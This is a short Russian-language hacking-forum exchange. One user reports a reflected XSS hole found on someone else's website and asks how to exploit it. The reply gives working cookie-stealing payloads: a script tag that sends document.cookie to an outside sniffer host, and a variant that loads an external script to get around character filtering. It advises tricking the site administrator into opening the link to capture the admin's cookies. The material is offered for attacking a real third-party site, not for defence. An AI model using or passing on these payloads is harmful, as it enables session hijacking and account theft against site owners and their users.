Я вот тут нашел сайт левенький, и через некоторое время нашел дыру XSS

http://www.......ru/news/index.php?param=1<h1>XSS</h1>

Только вот подскажите что я с этого теперь могу поиметь и как.

С начало читаем...

http://antichat.ru/crackchat/HTML/

http://antichat.ru/sniff/

Потом смотрим видео

http://video.antichat.net/1_0.html

Это пассивный XSS. Можешь вписать туда <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> если не фильтруются какие-либо спец символы. Если фильтруются можешь сделать так <script src=http://твой сайт/xss.js></script>Где в xss.js записано img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie; И дать эту ссылку админу. Если он лопух, получишь его куки.